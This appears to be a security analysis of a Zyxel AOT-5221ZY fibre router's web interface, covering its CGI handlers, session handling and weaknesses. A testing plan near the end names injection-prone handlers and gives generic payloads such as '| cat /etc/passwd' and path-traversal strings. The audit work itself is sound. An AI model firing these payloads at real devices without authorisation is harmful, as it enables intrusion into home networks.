Device: Zyxel AOT-5221ZY GPON ONT/ONU
Analysis Date: 2025-10-06
Web Root: /usr/shared/web/
- Executive Summary
- Web Server Architecture
- Web Interface Structure
- Page Organization
- CGI Backend Handlers (Complete List)
- Frontend Technologies
- Authentication & Session Management
- Security Analysis
- Frontend-Backend Validation Analysis
- API Endpoints
- Data Flow
- Vulnerabilities & Security Gaps
- Configuration Files
The Zyxel AOT-5221ZY web interface is a CGI-based system using:
- Web Server: mini_httpd (custom fork, version 1.30)
- Frontend: jQuery-based UI with JSON-driven dynamic pages
- Backend: 211 compiled C CGI binaries
- Data Model: TR-069/USP (InternetGatewayDevice) OID structure
- Session Management: Cookie-based with SessionKey validation
- Default Configuration: Movistar/Telefonica branding, Portuguese/English language
Total Web Components Found:
- 211 CGI binaries
- 38+ JSON tab definition files
- 50+ JavaScript files
- Hundreds of HTML fragments embedded in CGI binaries
Binary: /usr/bin/mini_httpd (78 KB)
Configuration Files (runtime):
- /etc/mini_httpd1.conf - Primary HTTP server
- /etc/mini_httpd2.conf - Secondary HTTP server (remote management)
- /etc/mini_httpd3.conf - Additional instance
- /etc/mini_httpd4.conf - Additional instance
PID Files:
- /tmp/mini_httpd1.pid
- /tmp/mini_httpd2.pid
- /tmp/mini_httpd3.pid
- /tmp/mini_httpd4.pid
Log Files:
/tmp/mini_httpd%d.log
SSL Certificate:
- /etc/mycert/web.pem (3,146 bytes) - Symlinked as /usr/shared/web/httpsCert.pem
Supported Methods:
- GET
- POST
Content Types:
- text/html; charset=ISO-8859-1
- text/html; charset=%s (configurable)
- text/plain; charset=%s
- application/log
- application/certification
- config/conf
CGI Support:
- CGI/1.1 interface
- Environment variables: GATEWAY_INTERFACE, SERVER_PROTOCOL, PATH_INFO
- Binary path: /usr/local/bin:/usr/ucb:/bin:/usr/bin:/usr/sbin
- Library path: /lib:/usr/lib:/lib/MSTC:/usr/lib/MSTC
Special Paths:
- /cgi-bin/ - Main CGI directory
- /mhs/APIS/ - Management API
- /mhs/jsps/ - JSP-style pages
- /pages/ - HTML page fragments
- /html/ - Static resources
Temporary Files:
- /tmp/.web_rcf - Web RCF (Runtime Configuration)
- /tmp/.webpipe - Web IPC pipe
- /tmp/TemporaryUseFile - Temporary upload storage
- /var/zerotouch.json - Zero-touch provisioning data
```
/usr/shared/web/
├── html/                      # Frontend static files
│   ├── index.html             # Entry point (redirects to indexmain.cgi)
│   ├── loginsum.html          # Login summary page
│   ├── bgiframe.htm           # Background iframe
│   ├── config.json            # Application configuration
│   ├── css/                   # Stylesheets
│   ├── js/                    # JavaScript files (50+ files)
│   ├── images/                # Image assets
│   ├── style/                 # Theme styles
│   │   └── Zyxel/             # Zyxel branding theme
│   └── pages/                 # Page definitions
│       ├── network/
│       ├── security/
│       ├── maintenance/
│       ├── voip/
│       ├── systemMonitoring/
│       ├── tabFW/
│       └── VD/
├── cgi-bin/                   # Backend CGI binaries (211 files)
│   ├── indexmain.cgi          # Main dashboard
│   ├── login_advance.cgi      # Login handler
│   ├── logout_advance.cgi     # Logout handler
│   ├── menuJson.cgi           # Menu structure provider
│   └── [208 more CGI binaries]
├── TabJson/                   # Tab configuration storage
├── httpsCert.pem -> /etc/mycert/httpsCert.pem
├── romfile.cfg -> /var/config.cfg
├── romd.cfg -> /tmp/mrdcert
├── System.log -> /var/log/System.log
├── ExtractLog.tar.gz -> /tmp/ExtractLog.tar.gz
└── zerotouch.json -> /var/zerotouch.json
```
The web interface is organized into major functional categories:
Network sub-sections:
- Broadband - WAN connectivity, PPPoE, DHCP, 3G backup
  - Handler: broadband.cgi
  - JSON: network/broadband/tab.json
  - Features: Connection management, 3G fallback support
- Home Networking - LAN, DHCP server, IP configuration
  - Handlers: lanSetup.cgi, ipv6LanSetup.cgi
  - JSON: network/homeNetworking/tab.json, tab_QInQ.json, tab_no_USB.json
  - Features: IPv4/IPv6 dual-stack, QinQ VLAN support
- Wireless - 2.4GHz WiFi settings
  - Handlers: wlan_general.cgi, wlan_MACAuthentication.cgi, wlan_wps.cgi
  - JSON: network/wireless/tab.json, tab_no_Scheduling.json
  - Features: WPS, MAC filtering, guest networks
- Wireless 5G - 5GHz WiFi settings
  - Handlers: wlan5_general.cgi, wlan5_MACAuthentication.cgi, wlan5_wps.cgi
  - JSON: network/wireless5G/tab.json
- Wireless EasyMesh - WiFi mesh networking
  - Handler: EasyMesh.cgi
  - JSON: network/wirelessEasyMesh/tab.json
  - Features: IEEE 1905.1 Multi-AP coordination
- Wireless Scheduling - Time-based WiFi control
  - Handlers: wlan_scheduling.cgi, wlan_schedule_add.cgi
  - JSON: network/wirelessScheduling/tab.json
- QoS - Quality of Service
  - Handlers: qos_general.cgi, qos_class.cgi, qos_queue.cgi, qos_shaper.cgi
  - JSON: network/qos/tab.json
  - Features: Traffic prioritization, bandwidth shaping
- NAT - Network Address Translation
  - Handlers: NAT_General.cgi, NAT_AddrMapping.cgi, portForwarding.cgi, dmz.cgi
  - JSON: network/nat/tab.json
  - Features: Port forwarding, port triggering, DMZ, address mapping
- Routing - Static routes, DNS routing
  - Handlers: static.cgi, dns_routing.cgi
  - JSON: network/routing/tab.json
  - Features: IPv4/IPv6 static routes, policy routing
- Port Binding - VLAN/port association
  - Handler: portbinding.cgi (inferred)
  - JSON: network/portbinding/tab.json
- Tunnel - GRE tunnels, IP tunnels
  - Handlers: gretunnel.cgi, ipTunnel.cgi
  - JSON: network/tunnel/tab.json, tab_gre_tunnel.json
- VPN Server - VPN service configuration
  - Handler: VPN-related CGIs (inferred)
  - JSON: network/VPNServer/tab.json
Security sub-sections:
- Firewall - Firewall rules and policies
  - Handlers: Multiple TELFirewall_*.cgi and TR181Firewall_*.cgi
  - JSON: security/firewall/tab.json, security/TEF181firewall/tab.json, security/TR181firewall/tab.json
  - Features: Stateful packet inspection, DoS protection
  - Note: Multiple firewall implementations (legacy TEL, TR-181 compliant)
- Filter - MAC/IP filtering
  - Handlers: IP_MAC_Filter.cgi, ipMacFilterList.cgi
  - JSON: security/filter/tab.json
- URL Filter - Web content filtering
  - Handlers: URL_Filter.cgi, URL_Filter_Edit.cgi, Keyword_Filter_list.cgi
  - JSON: security/urlfilter/tab.json
  - Features: Keyword blocking, domain filtering
- Parental Control - Time-based access control
  - Handlers: ParentalControl.cgi, ParentalControladd.cgi
  - JSON: security/parentalcontrol/tab.json
- Certificates - SSL/TLS certificate management
  - Handlers: localCA.cgi, trustedCA.cgi, sshCA_list.cgi
  - JSON: security/certificates/tab.json
  - Features: Local CA, trusted CA, SSH key management
VoIP sub-sections:
- SIP - SIP service provider settings
  - Handlers: sipServiceProvider.cgi, sipServiceProvider_setting.cgi, SIP_ALG.cgi
  - JSON: voip/sip/tab.json
- Phone - VoIP phone configuration
  - Handler: phone.cgi
  - JSON: voip/phone/tab.json
  - Features: FXS port configuration, codec settings
- Call Rules - Call routing and rules
  - Handlers: callRule.cgi, callRule_CO.cgi
  - JSON: voip/callrule/tab.json, tab_Unify_CO.json
- Call History - Call logs and records
  - Handler: Call history CGI (inferred)
  - JSON: voip/callhistory/tab.json
System Monitoring sub-sections:
- Traffic Status - Network traffic statistics
  - Handlers: traffic_wan.cgi, traffic_lan.cgi, traffic_nat.cgi
  - JSON: systemMonitoring/trafficStatus/tab.json
- Log - System log viewer
  - Handlers: viewlog.cgi, ViewSyslog.cgi
  - JSON: systemMonitoring/log/tab.json
- VoIP Status - VoIP connection status
  - Handlers: VoIPStatus.cgi, VoIPStatus_list.cgi
  - JSON: systemMonitoring/VoIPStatus/tab.json
Maintenance sub-sections:
- Remote Management - Remote access configuration
  - Handlers:
    - RemMagGeneral.cgi - General remote management
    - RemMagWWW.cgi - Web interface access
    - RemMagWWW4Airtel.cgi - Airtel-specific web access
    - RemMagSNMP.cgi - SNMP configuration
    - RemMagDNS.cgi - DNS configuration
    - RemMagICMP.cgi - ICMP (ping) configuration
    - RemMagSSH.cgi - SSH access
    - RemMagTELNET.cgi - Telnet access
  - JSON: maintenance/remotemgmt/tab.json, tab4Airtel.json, noSSH.json
  - Features: Multi-protocol remote access control
- Device Configuration - Backup/restore, factory reset
  - Handlers: backupRestore.cgi, reboot.cgi
  - JSON: maintenance/deviceConfiguration/tab.json
- Diagnostic - Network diagnostics
  - Handlers: DiagGeneral.cgi, ping.cgi, mirror.cgi
  - JSON: maintenance/disagnostic/tab.json
  - Features: Ping, traceroute, port mirroring
- Log Settings - Logging configuration
  - Handler: logSet.cgi
  - JSON: maintenance/logSetting/tab.json
- tabFW - Framework/template pages
  - Handler: tabFW.cgi
  - JSON: tabFW/tab.json
- VD (Vendor Customization) - Vendor-specific branding
  - Handlers: vd.cgi, vdview.cgi
  - Variants: P-660HNU-F1 specific customization
Login/Authentication:
- login_advance.cgi - Main login handler
- logout_advance.cgi - Logout handler
- passLogout.cgi - Password logout
- doregister.cgi - Registration handler
- clear_first_access.asp - First access flag clear
Main Interface:
- indexmain.cgi - Main dashboard/homepage
- menuJson.cgi - Dynamic menu generation
- naviView_partialLoad.cgi - Navigation partial loading
- info.cgi - System information
- current.cgi - Current status
- statusview.cgi - Status view
- networkMap.cgi - Network topology map
Network - Broadband/WAN:
- broadband.cgi - WAN configuration
- connection_icon_list.cgi - Connection status icons
- connection_table_list.cgi - Connection table
- connectionStatus_p1.cgi - Connection status page 1
- wanRemoteNode_ETH_Edit.cgi - Ethernet WAN edit
- wanRemoteNode_GPON_Edit.cgi - GPON WAN edit
Network - LAN:
- lanSetup.cgi - LAN configuration (IPv4)
- ipv6LanSetup.cgi - LAN configuration (IPv6)
- dhcp_static_list.cgi - DHCP static leases list
- staticDHCP_add.cgi - Add DHCP static lease
- staticDHCP.cgi - DHCP static configuration
Network - Wireless 2.4GHz:
- wlan_general.cgi - General WiFi settings
- wlan_MACAuthentication.cgi - MAC authentication
- wlan_macfilter_add.cgi - Add MAC filter
- wlan_macfilter_edit.cgi - Edit MAC filter
- wlan_mac_address_list.cgi - MAC address list
- wlan_mac_address_list1.cgi - MAC list (radio 1)
- wlan_mac_address_list2.cgi - MAC list (radio 2)
- wlan_mac_address_list3.cgi - MAC list (radio 3)
- wlan_moreAP.cgi - Multi-AP/Guest network
- wlan_moreap_edit.cgi - Edit multi-AP
- wlan_others.cgi - Other wireless settings
- wlan_wps.cgi - WPS configuration
- wlan_wpsinfo.cgi - WPS information
- wlan_WpsStatus.cgi - WPS status
- wlan_WPStimerRunning.cgi - WPS timer status
- wlan_staionInfo.cgi - Station information
- wlan_staionInfo_list.cgi - Station list
- wlan_staionInfo_list1.cgi - Station list (radio 1)
- wlan_staionInfo_list2.cgi - Station list (radio 2)
- wlan_staionInfo_list3.cgi - Station list (radio 3)
- moreApStatus.cgi - Multi-AP status
Network - Wireless 5GHz:
- wlan5_general.cgi - 5GHz general settings
- wlan5_MACAuthentication.cgi - 5GHz MAC auth
- wlan5_macfilter_add.cgi - Add 5GHz MAC filter
- wlan5_macfilter_edit.cgi - Edit 5GHz MAC filter
- wlan5_mac_address_list.cgi - 5GHz MAC list
- wlan5_mac_address_list1.cgi - 5GHz MAC list (radio 1)
- wlan5_mac_address_list2.cgi - 5GHz MAC list (radio 2)
- wlan5_mac_address_list3.cgi - 5GHz MAC list (radio 3)
- wlan5_moreAP.cgi - 5GHz multi-AP
- wlan5_moreap_edit.cgi - Edit 5GHz multi-AP
- wlan5_others.cgi - Other 5GHz settings
- wlan5_wps.cgi - 5GHz WPS
- wlan5_wpsinfo.cgi - 5GHz WPS info
- wlan5_WpsStatus.cgi - 5GHz WPS status
- wlan5_WPStimerRunning.cgi - 5GHz WPS timer
- wlan5_staionInfo.cgi - 5GHz station info
- wlan5_staionInfo_list.cgi - 5GHz station list
- wlan5_staionInfo_list1.cgi - 5GHz station list (radio 1)
- wlan5_staionInfo_list2.cgi - 5GHz station list (radio 2)
- wlan5_staionInfo_list3.cgi - 5GHz station list (radio 3)
Network - Wireless Scheduling:
- wlan_scheduling.cgi - WiFi schedule
- wlan_schedule_add.cgi - Add schedule
- wlan_schedule_edit.cgi - Edit schedule
- wlan_schedule_delete.cgi - Delete schedule
- schedule_list.cgi - Schedule list
Network - EasyMesh:
- EasyMesh.cgi - EasyMesh configuration
Network - QoS:
- qos_general.cgi - QoS general settings
- qos_class.cgi - QoS classification
- qos_queue.cgi - QoS queue management
- qos_shaper.cgi - Traffic shaping
- qos_class_add.cgi - Add QoS class
- queue_add.cgi - Add queue
- shaper_add.cgi - Add shaper
Network - NAT:
- NAT_General.cgi - NAT general settings
- NAT_AddrMapping.cgi - Address mapping
- nat.cgi - NAT configuration
- portForwarding.cgi - Port forwarding
- portForwarding_add.cgi - Add port forward
- portForwarding_edit.cgi - Edit port forward
- port_forwarding_list.cgi - Port forward list
- port_forwarding_delete.cgi - Delete port forward
- portTriggering.cgi - Port triggering
- portTriggering_add.cgi - Add port trigger
- portTriggering_edit.cgi - Edit port trigger
- port_Triggering_list.cgi - Port trigger list
- dmz.cgi - DMZ host configuration
- addrMap_add.cgi - Add address mapping
Network - Routing:
- static.cgi - Static routes
- static_route_list.cgi - Static route list
- static_add.cgi - Add static route
- ipv6static.cgi - IPv6 static routes
- ipv6static_add.cgi - Add IPv6 static route
- ipv6_static_route_list.cgi - IPv6 route list
- dns_routing.cgi - DNS routing
- dns_routing_add.cgi - Add DNS route
- dns_route_list.cgi - DNS route list
Network - Tunnel:
- gretunnel.cgi - GRE tunnel config
- gretunnel_add.cgi - Add GRE tunnel
- gretunnel_list.cgi - GRE tunnel list
- ipTunnel.cgi - IP tunnel config
Network - Other:
- dynamicDNS_InadynV2.cgi - Dynamic DNS (Inadyn v2)
- dynamicDNS_InterfaceIndex.cgi - DDNS interface
- ipalias.cgi - IP alias configuration
- upnp.cgi - UPnP configuration
- current_upnp_table.cgi - Current UPnP mappings
Security - Firewall:
- TELFirewall_general.cgi - TEF firewall general
- TELFirewall_DoS.cgi - DoS protection
- TELFirewall_DoS_Adv.cgi - Advanced DoS
- TELFirewall_FrwlEdit.cgi - Edit firewall
- TELFirewall_RuleEdit.cgi - Edit rule
- TELFirewall_RuleSIndex.cgi - Rule index
- TELFirewall_RuleSum.cgi - Rule summary
- TELFirewall_RuleSum_frame.cgi - Rule summary frame
- TELFirewall_RuleTable.cgi - Rule table
- TELFirewall_Table.cgi - Firewall table
- TELFirewall_InterfaceIndex.cgi - Interface index
- TELFirewall_IntfDirIndex.cgi - Interface direction
- TELFirewall_ServiceIndex.cgi - Service index
- TR181Firewall.cgi - TR-181 firewall
- TR181Firewall_RuleEdit.cgi - TR-181 rule edit
Security - Filter:
- IP_MAC_Filter.cgi - IP/MAC filtering
- ipMacFilterList.cgi - IP/MAC filter list
- URL_Filter.cgi - URL filtering
- URL_Filter_Edit.cgi - Edit URL filter
- URL_Filter_list.cgi - URL filter list
- URL_Filter_delete.cgi - Delete URL filter
- Keyword_Filter_list.cgi - Keyword filter list
Security - Parental Control:
- ParentalControl.cgi - Parental control
- ParentalControladd.cgi - Add parental control
- ParentalControl_view.cgi - View parental control
Security - Certificates:
- localCA.cgi - Local CA management
- localCA_frame.cgi - Local CA frame
- trustedCA.cgi - Trusted CA management
- trustedCA_add.cgi - Add trusted CA
- trustedCA_view.cgi - View trusted CA
- sshCA_list.cgi - SSH CA list
VoIP - SIP:
- sipServiceProvider.cgi - SIP provider config
- sipServiceProvider_setting.cgi - SIP provider settings
- sipServiceProvider_list.cgi - SIP provider list
- sipAccount.cgi - SIP account config
- sipAccount_setting.cgi - SIP account settings
- sipAccount_list.cgi - SIP account list
- SIP_ALG.cgi - SIP ALG configuration
VoIP - Phone:
- phone.cgi - Phone configuration
VoIP - Call Rules:
- callRule.cgi - Call rules
- callRule_CO.cgi - Call rules (CO variant)
VoIP - Status:
- VoIPStatus.cgi - VoIP status
- VoIPStatus_list.cgi - VoIP status list
System Monitoring - Traffic:
- traffic_wan.cgi - WAN traffic
- traffic_wan_frame1.cgi - WAN traffic frame 1
- traffic_wan_frame2.cgi - WAN traffic frame 2
- traffic_lan.cgi - LAN traffic
- traffic_lan_frame.cgi - LAN traffic frame
- traffic_nat.cgi - NAT traffic
System Monitoring - Logs:
- viewlog.cgi - View logs
- ViewSyslog.cgi - View syslog
Maintenance - Remote Management:
- RemMagGeneral.cgi - General remote mgmt
- RemMagWWW.cgi - Web remote access
- RemMagWWW4Airtel.cgi - Web access (Airtel)
- RemMagSNMP.cgi - SNMP configuration
- RemMagDNS.cgi - DNS configuration
- RemMagICMP.cgi - ICMP/Ping configuration
- RemMagSSH.cgi - SSH access
- RemMagTELNET.cgi - Telnet access
Maintenance - Device Config:
- backupRestore.cgi - Backup/restore
- reboot.cgi - Reboot device
- rebootinfo.cgi - Reboot information
- system.cgi - System configuration
- time.cgi - Time/NTP configuration
Maintenance - Diagnostics:
- DiagGeneral.cgi - General diagnostics
- ping.cgi - Ping tool
- mirror.cgi - Port mirroring
Maintenance - Logs:
- logSet.cgi - Log settings
- zlog.cgi - Zlog configuration
Maintenance - Firmware:
- firewareUpgrade.cgi - Firmware upgrade (typo in original)
- Fireware_UpgradesManaged.cgi - Managed firmware upgrade
TR-069/USP Management:
- tr69cfg.cgi - TR-069 configuration
- tr369.cgi - TR-369/USP configuration
- agentMTP.cgi - USP agent MTP
- agentMTP_list.cgi - USP agent MTP list
- controller.cgi - USP controller
- controller_list.cgi - USP controller list
- stompConn.cgi - STOMP connection
- stompConn_list.cgi - STOMP connection list
- mqttClient.cgi - MQTT client
- mqttClient_list.cgi - MQTT client list
File Sharing:
- fileSharing.cgi - File sharing config
- fileSharing_add.cgi - Add file share
- fileSharing_mod.cgi - Modify file share
- fileSharing_del.cgi - Delete file share
- fileSharing_list.cgi - File share list
- fileSharing_browse.cgi - Browse file shares
- fileuser_add.cgi - Add file user
- fileuser_mod.cgi - Modify file user
- fileuser_del.cgi - Delete file user
- fileuser_list.cgi - File user list
- printServer.cgi - Print server config
User Management:
- userAccount.cgi - User account management
PCP (Port Control Protocol):
- PCP_ClientListIndex.cgi - PCP client list
- PCP_ClientListIndex_view.cgi - PCP client view
- PCP_list.cgi - PCP list
- pcplist.cgi - PCP list (alternate)
GPON Specific:
- gponPassword.cgi - GPON password config
Vendor/Custom:
- vd.cgi - Vendor customization
- vdview.cgi - Vendor view
- tabFW.cgi - Tab framework
Utility/Framework:
- delete.cgi - Generic delete handler
- delete_RuleSum.cgi - Delete rule summary
- autofw_notify.asp - Auto-forward notification
- autofw_notify_check.asp - Auto-forward check
Core Libraries:
- jQuery 1.3.2 (jquery-1.3.2.min.js)
- jQuery 1.6.3 (jquery-1.6.3.min.js)
- jQuery 3.6.0 (jquery-3.6.0.min.js)
- jQuery 3.6.3 (jquery-3.6.3.min.js)
- jQuery Migrate 1.4.1 (compatibility layer)
⚠️ Multiple jQuery versions loaded
jQuery UI:
- jquery-ui-1.7.2.custom.min.js
- jquery-ui-dialog.min.js
- jquery-ui-slider.min.js
jQuery Plugins:
- jquery.tablesorter.min.js - Table sorting
- jquery.validate.pack.js - Form validation
- jquery.cookie.js - Cookie management
- jquery.tooltip.min.js - Tooltips
- jquery.simplemodal-1.3.min.js - Modal dialogs
- jquery.clickmenu.pack.js - Click menus
- jquery.bgiframe.pack.js - IE6 iframe fix
- jquery.pngFix.pack.js - PNG transparency fix
- jquery.layout.js - Page layout
- jquery.easing.1.3.js - Animation easing
- jquery.mousewheel.js - Mouse wheel support
- jquery.getParams.js - URL parameter parsing
- jquery.jgrowl.joze_mini.js - Notifications
- jquery.watermarkinput.js - Input placeholders
- jquery.text-overflow.js - Text truncation
- jquery.tools.min_tab.js - Tab interface
- jquery.zyCheckTree.js - Zyxel custom tree component
Custom Zyxel JavaScript:
- zyjs/ - Zyxel JavaScript library directory
- zyJqFunctions.js - Zyxel jQuery extensions
- zyMacUi.js - MAC address UI components
- zyMask.js - Input masking
- zyUiDialog.js - Custom dialogs
Application Logic:
- common.js - Common utilities
- functions.js - General functions
- General.js - General application logic
- javascript.js - Main application code
- jsonParser.js - JSON parsing
- jsl.js - JavaScript library extensions
- util.js - Utility functions
- security.js - Security functions
- wireless.js - Wireless-specific logic
- VD.js - Vendor customization logic
- portDef.js - Port definitions
- TimeZone.js - Timezone handling
- switch.js - Switch/toggle components
- ip_new.js - IP address handling
- loadingMask.js - Loading overlays
- userSwitchPanel.js - User switching
- Multi_Language.js - Internationalization
Framework Components:
- brickRichMenu.js - Menu component
- iframe.jquery.js - iframe utilities
- tools.scrollable-1.1.0.min.js - Scrolling
Location: /usr/shared/web/html/css/
Themes:
- Zyxel branding theme in /style/Zyxel/
- Movistar branding (default per config.json)
Supported Languages:
- English (en) - language.en.json
- Portuguese (pt) - language.pt.json (default)
Default Configuration:
- Language: Portuguese
- Branding: Movistar (Telefonica Spain/Latin America)
- Country: ES (Spain)
Entry Point:
- User accesses /index.html
- Redirects to /cgi-bin/indexmain.cgi
- If not authenticated, redirects to /cgi-bin/login_advance.cgi
- Login page displays login form
Login Handler: login_advance.cgi
Login Process:
User Input (username/password)
↓
POST to login_advance.cgi
↓
Backend validation (libwebutil.so)
↓
Check username/password against:
- /etc/config/rpcd (root user)
- Virtual user database
- PAM authentication
↓
If valid:
- Generate SessionKey
- Set HTTP cookie (session=SessionKey)
- Store session in /tmp/session_*
- Redirect to indexmain.cgi
↓
If invalid:
- Return to login page with error
Session Cookie:
- Name: session
- Value: SessionKey (random token)
- Path: /
- Secure: HTTPS only (if configured)
Session Functions (libwebutil.so):
Session Creation:
- cgiValidateAddSessionKey - Add new session
- cgiHeaderCookieSetString - Set cookie header
- cgiGetCurrSessionKey - Get current session key
Session Validation:
- cgiSessionCheck - Validate session on each request
- cgiValidateLocalSessionKey - Validate local session
- CookieGet - Get cookie value
- getSessionFilePathFromCookie - Resolve session file
Session Cleanup:
- cgiSessionClean - Clean expired sessions
Session Storage:
- Session files likely in /tmp/session_* or /var/run/
- Contains: SessionKey, CurrSessionTime, SessionIP
Session Timeout:
- Configured in config.json: "SessionMaxTime": 600 (10 minutes)
- Warning before timeout: "SessionWarning": false (disabled)
Session Security:
- IP address validation (SessionIP)
- Timestamp validation (CurrSessionTime)
- SessionKey randomness check
- Automatic lockout: SessionLockedState, SessionLockedTime
Paths Checked:
- /cgi-bin/login_advance.cgi - Login required
- /cgi-bin/logout_advance.cgi - Always accessible
- Static resources (css, js, images) - Typically no auth required
- Error pages - No auth required
Potential Bypasses (to test):
- Direct CGI access without session cookie
- Session fixation attacks
- CSRF token absence
- Cookie tampering
From rpcd config (/etc/config/rpcd):
```
config login
    option username 'root'
    option password '$p$root'
    list read '*'
    list write '*'
```
Username: root
Password Hash: $p$root - This appears to be a placeholder/template
Actual Password:
- Not hardcoded in firmware
- Set during provisioning or first login
- May default to device-specific value (serial number, etc.)
Permissions:
- Full read access: '*'
- Full write access: '*'
✅ Session-Based Authentication
- Cookie-based sessions with SessionKey
- IP address binding
- Timeout enforcement (10 minutes default)
- Session locking mechanism
✅ HTML Escaping
- escape_html() function in libwebutil
- cgiHtmlEscape() for CGI output
- escapeBackslash4JS() for JavaScript context
✅ HTTPS Support
- SSL certificate: /etc/mycert/web.pem
- mini_httpd supports HTTPS
✅ Access Control
- Per-user read/write permissions (rpcd)
- Login privilege management (OID: LoginPrivilegeMgmt)
✅ Input Validation
- check_value() function
- checkUsedLanguage() for language validation
- checkTimeOut() for session timeout
✅ Anti-Automation
- Session locking after failed attempts
- Timeout enforcement
❌ Weak Default Password Hash
- Password hash in rpcd config: $p$root
- Format suggests weak or placeholder hash
- Risk: Brute-force attack, rainbow tables
❌ Multiple jQuery Versions
- jQuery 1.3.2 (released 2009) - Known XSS vulnerabilities
- jQuery 1.6.3 (2011) - CVE-2011-4969 (XSS)
- jQuery 3.6.0/3.6.3 - Relatively current
- Risk: XSS exploitation via old jQuery
❌ No CSRF Protection Observed
- No CSRF token generation found
- No CSRF validation in CGI handlers
- Risk: Cross-site request forgery attacks
❌ Inconsistent Input Validation
- Some CGI binaries may lack input validation
- Frontend validation != backend validation
- Need to audit: Each CGI for proper input sanitization
❌ Session File Storage Unconfirmed
- Session files location not confirmed
- Might be predictable paths in /tmp/
- Risk: Session hijacking if files world-readable
❌ No HTTPS Enforcement
- If HTTPS not enforced, credentials sent in clear
- No evidence of forced HTTPS redirect
- Risk: Man-in-the-middle attacks
❌ HTML Templates Embedded in Binaries
- HTML templates embedded in CGI binaries
- Difficult to audit for XSS
- Risk: Persistent XSS if templates have vulnerabilities
❌ Multiple mini_httpd Instances
- 4 mini_httpd instances possible
- Different configurations may have different security
- Risk: Inconsistent security posture
❌ Possibly Outdated Libraries
- Firmware from 2024 but may use old libraries
- Need to check: OpenSSL/LibreSSL version in libcrypto
❌ No Rate Limiting Confirmed
- Login endpoint may lack rate limiting
- Risk: Brute-force attacks
❌ Debug Strings in Binaries
- Debug strings in binaries
- May leak sensitive information
- Risk: Information disclosure
❌ Debug Firmware Flag
- isDebugVersionFW flag found
- Debug-specific CGI paths
- Risk: Debug endpoints may bypass security
❌ Telnet Support
- RemMagTELNET.cgi suggests Telnet support
- Risk: Unencrypted remote access
Found in jQuery Validate plugin:
- Form field validation
- Input format checking
- Client-side sanitization
Limitations:
- ✗ Can be bypassed via browser DevTools
- ✗ Can be bypassed by direct HTTP requests
- ✗ Not security-relevant (convenience only)
Functions Found:
- check_value() - Generic value checking
- cgiHtmlEscape() - HTML entity encoding
- escape_html() - HTML escaping
- escapeBackslash4JS() - JavaScript escaping
OID Validation:
- All CGI access data via OID (InternetGatewayDevice.*)
- OID layer may provide validation
- Functions: cccRdmGetObjectByOID(), cccRdmGetObjListByOID()
Methodology: To identify frontend/backend validation gaps, the following tests should be performed:
- Bypass Frontend Validation:
  - Capture legitimate request in browser
  - Modify POST data to invalid values
  - Submit directly via curl/Burp
  - Check if backend accepts invalid data
- Parameter Tampering:
  - Add extra parameters
  - Remove required parameters
  - Change parameter types (string→number, etc.)
- Boundary Testing:
  - Oversized inputs (buffer overflow)
  - Special characters injection
  - Null bytes, Unicode edge cases
Based on naming and common patterns:
High Priority for Testing:
- File Upload Handlers:
  - firewareUpgrade.cgi (firmware upload)
  - backupRestore.cgi (config upload)
  - ⚠️ Risk: Path traversal, malicious file upload
- Command Injection Candidates:
  - ping.cgi - May execute system ping command
  - DiagGeneral.cgi - May execute diagnostic commands
  - ⚠️ Risk: Command injection via unsanitized input
- SQL Injection Candidates (if DB used):
  - Any CGI with _list suffix (queries)
  - Filter/search functions
  - ⚠️ Risk: SQL injection (if using SQL database)
- Path Traversal:
  - fileSharing_browse.cgi - File browsing
  - viewlog.cgi - Log file access
  - ⚠️ Risk: Directory traversal to access sensitive files
- XSS Candidates:
  - Any CGI that echoes user input
  - menuJson.cgi - Dynamic content generation
  - naviView_partialLoad.cgi - Partial page loads
  - ⚠️ Risk: Reflected/Stored XSS
For Each CGI:
- Intercept legitimate request
- Test with:
  - SQL injection payloads: `' OR '1'='1`, `'; DROP TABLE--`
  - Command injection: `; ls`, `| cat /etc/passwd`, `` `whoami` ``
  - Path traversal: `../../../etc/passwd`, `..\\..\\windows\\system32`
  - XSS payloads: `<script>alert(1)</script>`, `<img src=x onerror=alert(1)>`
  - Buffer overflow: Very long strings (10KB+)
  - Format strings: `%s%s%s%n`
  - Null bytes: `file.txt\0.jpg`
- Check response for:
  - Execution indicators (error messages, timing)
  - Reflected input (XSS)
  - File disclosure
  - Server errors (500 = possible vulnerability)
Menu Structure API:
- Endpoint: /cgi-bin/menuJson.cgi
- Purpose: Dynamic menu generation based on user permissions and features
- Format: JSON response
Tab Configuration API:
- Endpoints: Each page has a corresponding /html/pages/*/tab.json
- Purpose: Define page structure and CGI mappings
- Format: Static JSON files
Example Tab JSON Structure:
```json
{
  "tabTitle": "MLG_Menu_SubTitle_RemoteMGMT",
  "pageIndex": "maintenance-remotemgmt",
  "MLG_Tab_subTitle_General": {
    "url": "../../../cgi-bin/RemMagGeneral.cgi"
  },
  "MLG_Tab_subTitle_WWW": {
    "url": "../../../cgi-bin/RemMagWWW.cgi"
  }
}
```
MHS API Path:
- /mhs/APIS/ - Management Host System API
- /mhs/jsps/ - JSP-style management pages
Purpose: Likely for ISP/OLT remote management
Zero-Touch Provisioning:
- File: /var/zerotouch.json
- Purpose: Auto-configuration data from network
- Accessible via: /zerotouch.json symlink in web root
TR-069 CGI:
- tr69cfg.cgi - TR-069 configuration via web UI
- tr69cfg.html - TR-069 status page
TR-369/USP CGI:
- tr369.cgi - USP configuration
- agentMTP.cgi - Message Transfer Protocol config
- controller.cgi - USP controller management
- stompConn.cgi - STOMP protocol connections
- mqttClient.cgi - MQTT connections
Data Model:
- Based on InternetGatewayDevice OID structure
- USP Device.LocalAgent.* objects
- Backend handles OID queries via libbemodules.so
User Browser
↓
HTTPS Request to mini_httpd (port 443/8080)
↓
mini_httpd validates session cookie
↓
If session valid:
- Parse request (GET/POST)
- Extract CGI path
- Set environment variables
- Execute CGI binary (/usr/shared/web/cgi-bin/X.cgi)
↓
CGI Binary Execution:
- Link libwebutil.so (session, HTML escaping)
- Link libbemodules.so (backend OID access)
- Parse POST/GET parameters
- Call cgiSessionCheck()
- Process business logic
- Call OID functions (cccRdmGetObjectByOID, etc.)
- Generate HTML output (embedded in binary)
- Call escape_html() on user input
- Output to stdout
↓
mini_httpd receives stdout
↓
Add HTTP headers (Content-Type, Set-Cookie, etc.)
↓
Send response to browser
Web UI Change
↓
CGI validates input
↓
Update OID via libbemodules.so
↓
OID change triggers backend action (be_*)
↓
Backend module (libbemodules.so):
- Validate change
- Update RDM (Runtime Data Model)
- Write to /var/config.cfg
- Trigger system command (e.g., restart service)
- Send ubus notification
↓
Service reconfigures (dhcp, firewall, wifi, etc.)
↓
Configuration persisted to flash (/var/config.cfg)
